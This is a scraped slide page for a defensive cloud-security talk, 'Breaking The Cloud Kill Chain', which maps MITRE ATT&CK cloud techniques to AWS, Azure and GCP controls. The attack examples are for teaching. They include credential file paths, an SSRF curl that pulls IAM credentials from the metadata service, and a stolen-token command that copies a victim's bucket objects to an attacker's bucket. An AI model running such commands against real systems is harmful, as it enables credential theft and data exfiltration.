Cloud Security Architecture.pptxCloud Security Architecture.pptx
Cloud Security Architecture.pptxMoshe Ferber
 
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...Amazon Web Services
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 ThreatsHackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 ThreatsAmazon Web Services
 

Similar to Breaking The Cloud Kill Chain (20)

Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
 
AWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS Security
 
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
 
AWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - HoustonAWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - Houston
 
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
 
Advanced Security Best Practices Masterclass
Advanced Security Best Practices MasterclassAdvanced Security Best Practices Masterclass
Advanced Security Best Practices Masterclass
 
AWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design PatternsAWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design Patterns
 
Network Security and Access Control within AWS
Network Security and Access Control within AWS Network Security and Access Control within AWS
Network Security and Access Control within AWS
 
Understanding AWS Security
Understanding AWS SecurityUnderstanding AWS Security
Understanding AWS Security
 
Building A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for ScaleBuilding A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for Scale
 
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
 
Comenzando com la nube hibrida
Comenzando com la nube hibrida Comenzando com la nube hibrida
Comenzando com la nube hibrida
 
DevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessDevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security Success
 
AWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxAWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptx
 
Cloud Security Architecture.pptx
Cloud Security Architecture.pptxCloud Security Architecture.pptx
Cloud Security Architecture.pptx
 
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
AWS re:Invent 2016: How Harvard University Improves Scalable Cloud Network Se...
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 ThreatsHackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats
 

More from Puma Security, LLC

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
DevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit TestsDevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit TestsPuma Security, LLC
 
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated EnvironmentsLessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated EnvironmentsPuma Security, LLC
 
Winning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless InfrastructureWinning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless InfrastructurePuma Security, LLC
 
Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020Puma Security, LLC
 
Cloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata ServiceCloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata ServicePuma Security, LLC
 
DevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessDevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessPuma Security, LLC
 
Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelinePuma Security, LLC
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanPuma Security, LLC
 

More from Puma Security, LLC (10)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
DevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit TestsDevSecOps: Let's Write Security Unit Tests
DevSecOps: Let's Write Security Unit Tests
 
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated EnvironmentsLessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
Lessons Learned Deploying Modern Cloud Systems in Highly Regulated Environments
 
Winning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless InfrastructureWinning in the Dark: Defending Serverless Infrastructure
Winning in the Dark: Defending Serverless Infrastructure
 
Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020Defending Serverless Infrastructure in the Cloud RSAC 2020
Defending Serverless Infrastructure in the Cloud RSAC 2020
 
Cloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata ServiceCloud Security: Attacking The Metadata Service
Cloud Security: Attacking The Metadata Service
 
DevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessDevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security Success
 
Weaponizing Your DevOps Pipeline
Weaponizing Your DevOps PipelineWeaponizing Your DevOps Pipeline
Weaponizing Your DevOps Pipeline
 
Secure DevOps: A Puma's Tail
Secure DevOps: A Puma's TailSecure DevOps: A Puma's Tail
Secure DevOps: A Puma's Tail
 
Continuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma ScanContinuous Integration - Live Static Analysis with Puma Scan
Continuous Integration - Live Static Analysis with Puma Scan
 

Recently uploaded

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

Breaking The Cloud Kill Chain

  • 2. Eric Johnson • Principal Security Engineer, Puma Security → Coder: cloud infrastructure automation, CI / CD orchestration, static analysis engine, security tools → Security assessments: Cloud, DevOps, source code, web apps, mobile apps • Senior Instructor, SANS Institute → Contributing author of SEC540, SEC510, SEC549 • Education & Training → Iowa State M.S. Information Assurance, B.S. Computer Engineering → AWS Certified Developer, CISSP, GPCS, GSSP, GWAPT • Contact information → Email: ejohnson@pumasecurity.io → LinkedIn: https://www.linkedin.com/in/eric-m-johnson/ → Twitter: @emjohn20 $ aws sts get-caller-identity 2
  • 3. ŒCloud MITRE ATT&CK Framework Cloud Infrastructure Discovery ŽUnsecured Credentials Network Service Discovery Transfer Data to Cloud Account Agenda 3
  • 4. MITRE ATT&CK tactics covering cloud-based attack techniques: Understanding the Cloud Kill Chain 4
  • 5. The MITRE ATT&CK Cloud Matrix guides our attack methodology for the key cloud services: MITRE ATT&CK Cloud Services 5
  • 7. MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access: Cloud Infrastructure Discovery 7 • Storage buckets • Big data sets / databases • Container image repositories • Secrets and cryptographic keys • Virtual machine image or database snapshots
  • 8. AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly: AWS Publicly Exposable Resources 8 • S3 Bucket ACLs and public bucket policy • EBS Volume Snapshots shared publicly • EC2 Amazon Machine Images shared publicly • ECR container image public repositories • RDS Database and Cluster Snapshots • SQS Queue public policy • SNS notification topics public policy • Lambda function URLs provided a dedicated HTTPS endpoint • More at https://github.com/SummitRoute/ aws_exposable_resources
  • 9. Big Query Datasets support sharing with allUsers and external cloud identity accounts: BigQuery Public Datasets 9
  • 10. 10 Azure Virtual Machines Disk Snapshots • Sharable with other users in the AD tenant • Supports direct downloads using SAS tokens • Provides a non-VNet bound way to exfiltrate snapshots
  • 11. Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy: Breaking The Kill Chain: MITRE ATT&CK T1580 11 • Service Control Policy (SCP) • Azure Policy • Organization Policy AWS Azure GCP
  • 12. Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization: Breaking The Kill Chain: Cloud Resource Hierarchy 12
  • 13. 13 Breaking The Kill Chain: Service Control Policies { "Statement": [ { "Action": [ "s3:PutAccountPublicAccessBlock" ], "Resource": "*", "Effect": "Deny" } ] } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Example SCPs blocking API calls to modify public S3 and Lambda function URL configurations: { "Statement": [ { "Action": [ "lambda:CreateFunctionUrlConfig", "lambda:UpdateFunctionUrlConfig" ], "Resource": "arn:aws:arn:aws:lambda:*:*:function/*", "Effect": "Deny", "Condition": { "StringNotEquals": { "lambda:FunctionUrlAuthType": "AWS_IAM" … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14
  • 15. MITRE ATT&CK T1522: Discovering insecurely stored IAM and service account credentials: Unsecured Credentials 15 Unsecured Credential Locations Bash History Configuration Files Source Code Version Control Instance Metadata Service Environment Variables
  • 16. Attackers target credentials that map to many different resource types across the cloud providers: Cloud Credential Types 16 • IAM Users & Roles • Service Principal & Managed Identity • Service Accounts AWS IAM Azure AD Cloud Identity
  • 17. Cloud-focused malware (e.g., TeamTNT) will focus on common locations with cleartext credentials: • ~/.aws/credentials • ~/.azure/accessTokens.json • ~/.config/gcloud/*credential* • ~/.ssh/* Configuration File Credentials 17
  • 18. • Node Package Manager • Scanned by Aidan Steele in October 2021 • Identifies 117 valid API keys, including 30 AWS root access keys • https://sec549.com/id259 Version Control and Package Managers 18 • Python Package Index (PyPI) • Scanned by Tom Forbes in January 2023 • Identifies 57 valid AWS API keys, including 11 AWS root access keys • https://sec549.com/id260
  • 19. 19 Environment Variable Credentials env | grep 'AWS' AWS_LAMBDA_FUNCTION_VERSION=$LATEST AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g== AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a AWS_DEFAULT_REGION=us-east-1 AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A 1 2 3 4 5 6 7 8 9 • Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables • Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables
  • 20. 20 Server-Side Request Forgery Credential Extraction curl -s "https://nimbus.labs/api/emrs?resource=http://169.254.169.254/latest/meta- data/iam/security-credentials/nimbus-iam-role { "Code" : "Success", "LastUpdated" : "2020-04-16T18:36:31Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIA54BL6PJR3MV6PUNZ", "SecretAccessKey" : "S0M6vF4UmMlfmV5B/bM2lalWpdTzocbUsSWMMHRI", "Token" : "IQoJb3JpZ2luX2VjEJP...3QtMSJGMEQCIGlgtwykQYitLv8Vg==", "Expiration" : "2020-04-17T00:52:19Z" } 1 2 3 4 5 6 7 8 9 10 11 12 Server-side Request Forgery (SSRF) vulnerabilities can allow attackers to communicate directly with virtual machine instance metadata services:
  • 21. Defending against unsecured credentials requires defense in depth controls: Breaking The Kill Chain: MITRE ATT&CK T1522 21 • Cloud Threat Detection • OpenID Connect Identity Provider Secrets Scanning Compromised Credential Detection Workload Identity Federation • Version Control Repositories
  • 22. Breaking The Kill Chain: Version Control Secrets Scanning 22 Perform incremental and continuous secrets scanning:
  • 23. Cloud-native threat detection capabilities have limited capabilities for finding stolen credentials: Breaking The Kill Chain: Cloud Threat Detection 23 AWS GuardDuty • *:IAMUser/ AnomalousBehavior • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. InsideAWS • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. OutsideAWS
  • 24. 24 Breaking The Kill Chain: Cloud Threat Hunting protoPayload: { @type: "type.googleapis.com/google.cloud.audit.AuditLog" authenticationInfo: { principalEmail: "cheetah-354157@appspot.gserviceaccount.com" principalSubject: "user:sec510-354157@appspot.gserviceaccount.com" } … methodName: "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion" resourceName: "projects/123456789012/secrets/cheetah-database-pass/versions/latest" serviceName: "secretmanager.googleapis.com" requestMetadata: { callerIp: "95.025.143.109" callerSuppliedUserAgent: "curl/7.64.1,gzip(gfe),gzip(gfe)" … } } … timestamp: "2023-01-10T20:30:00.192825193Z" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Threat hunting will have to fill the gaps: Google Cloud Logging WHY IS A CLOUD FUNCTION SERVICE ACCOUNT… ACCESSING SECRETS… FROM AN EXTERNAL IP ADDRESS?
  • 25. Breaking The Kill Chain: Workload Identity Federation 25 Protip: Long-lived credentials must die!
  • 27. MITRE ATT&CK T1046: Enumerating resources with public IP addresses in the victim's cloud account: Network Service Discovery 27 • VPC-bound resource types include: • Virtual machines, load balancers, containers, datastores, Redis clusters, data lakes • Public cloud IP address blocks are well known • Large scale cloud network service discovery (e.g., Shodan, Nmap) • Cloud Scanning For Vulnerability Discovery by @joswr1ght • https://sec510.com/1042 • Identify remotely exploitable hosts and software
  • 28. EC2 instances created in the AWS Web Console auto-generate a new security group with default open admin access: • Linux VMs auto populate open SSH access • Windows VMs auto populate open RDP access AWS Default Virtual Machine Security Group 28
  • 29. Azure Virtual Machines created in the UI default to open admin access: • Linux VMs auto-populate open SSH access • Windows VMs auto-populate RDP access Azure Default Virtual Machine Network Access 29
  • 30. Default VPC contains pre-populated firewall rules allowing wide open administrative access: GCP Default Network Firewall Rules 30
  • 31. Shodan searching for virtual machines on Google Compute Engine exposing SSH and RDP ports: Misconfigured GCP Firewall Rules 31
  • 32. Defending against network service discovery requires organizations to build more advanced network architectures: Breaking The Kill Chain: MITRE ATT&CK T1046 32 • Shared VPC & Transit Gateway • Azure Virtual WAN • Shared VPC, Cloud Routing, Peering, VPN AWS Azure Google Cloud
  • 33. Centralize VPC resources into a single network host account (or project) in the resource hierarchy: Breaking The Kill Chain: VPC Sharing 33 • VPC networks & subnets • Internet & NAT Gateways • Public IP addresses • Route tables • Firewall rules → NACLs → Security Groups • VPC Endpoints
  • 34. 34 Breaking The Kill Chain: Restricting Public Network Connectivity { "Sid": "RestrictPublicConnectivityToInfrastructureAccounts", "Effect": "Deny", "Action": [ "ec2:AllocateAddress", "ec2:AttachInternetGateway", "ec2:CreateInternetGateway", "ec2:CreateEgressOnlyInternetGateway", "ec2:CreateVpcPeeringConnection", "ec2:AcceptVpcPeeringConnection", "globalaccelerator:Create*", "globalaccelerator:Update*" ], "Resource": "*", "Condition": { "StringNotEquals": { "aws:PrincipalAccount": [ "123456789012" ] … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Preventing unauthorized public network access: ACTIONS CREATING PUBLIC CONNECTIVITY… DENY…. EXCEPT FOR THE NETWORK HOST ACCOUNT
  • 35. Breaking The Kill Chain: Centralized Resource Configurations 35 Centralizing network resources into the network host account provides a single pane of glass for public connectivity: PUBLIC INVENTORY
  • 36. Breaking The Kill Chain: Centralized Inbound, Outbound, Traffic Inspection 36
  • 37. T1537: Transfer Data to Cloud Account
  • 38. MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud account by escalating privileges and transferring data on the cloud provider's backbone network to avoid network-based detection Transfer Data to the Attacker's Cloud Account 38 • Compromising over permissioned service accounts • Impersonating a target service account • Transferring data across the cloud provider's backbone network • Pivoting with stolen credentials
  • 39. 39 Privilege Escalation: Azure Overly Scoped Role Definition { "assignableScopes": [ "/subscriptions/${var.subscription_id}" ], "permissions": [ { "actions": [ "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Storage/storageAccounts/ListAccountSas/action", "Microsoft.Storage/storageAccounts/read" ], } ], "roleName": "Storage Access" } 1 2 3 4 5 6 7 8 9 10 11 12 13 Example role definition allowing excessive permissions and overly scoped access to resources: SUBSCRIPTION-WIDE SCOPE TO ALL STORAGE ACCOUNTS
  • 40. Google Cloud's Primitive Editor role has permission to view, modify, and delete existing project resources (with a few exceptions): • Default role assigned to Compute instances, App Engine services, and Cloud Functions • Too permissive for what your workload needs in production • Has over 4,000 assigned permissions on the project • Attackers compromising workloads with Editor permissions can access data across the project Privilege Escalation: Google Cloud's Primitive Editor Role 40
  • 41. Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account: • AWS: iam:PassRole permission • GCP: iam.serviceAccounts.actAs permission Privilege Escalation: Transitive Permission Assignment 41 Create a Compute Instance Configure Compute to Run as the target service account Obtain token through the Instance Metadata Server (IMDS) Impersonate Privileged Service Account in Project
  • 42. Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network: • Private link services are designed to help customers keep data from traversing the Internet • Default policy (AWS, GCP) allows multi- tenant access to the cloud provider APIs • May allow data to move cross-tenant between resources without network and firewall inspection Data Exfiltration: Transferring Data Cross Tenant 42
  • 43. 43 Data Exfiltration: Stolen Credential Pivoting export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/ computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token) # List all storage buckets in the victim's project curl -s -H "Authorization: Bearer $BEARER_TOKEN" "https://storage.googleapis.com/storage/v1/b?project=victims-project" # Copy objects from the victim's bucket curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers- bucket/o/data.pdf 1 2 3 4 5 6 7 8 9 10 11 Exfiltrating data from the victim's Google Cloud project using the stolen credential:
  • 44. Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant: Breaking The Kill Chain: MITRE ATT&CK T1537 44 • IAM Access Analyzer • IAM Recommender • Private Link Services • Network Access Rules • VPC Service Controls AWS / GCP AWS / Azure Google Cloud
  • 45. Breaking The Kill Chain: IAM Recommender 45 Reviewing IAM Recommender reports and reducing excessive permissions:
  • 46. Breaking The Kill Chain: Service Endpoint Configuration 46 Preventing data exfiltration with private link services and network access policy:
  • 47. Breaking The Kill Chain: VPC Service Controls 47 Configuring a VPC Service Controls perimeter to prevent data exfiltration: • Perimeter includes the authorized projects • In-scope services include the GCS storage service • Unauthorized projects and external clients cannot interact with the target GCS bucket
  • 49. Breaking The Cloud Kill Chain requires an in-depth understanding of cloud-native services and configurations: Closing Remarks Resources can be made public too easily, build guardrails with the policy hierarchy Credential management continues to be a problem, move to workload identity federation Cloud resources are Internet exposed too easily, central network inspection is critical New ways to hide & exfiltrate data exist, focus on building network identity perimeters
  • 50.
  • 51. 51
  • 52. Thank you for attending! Questions? 52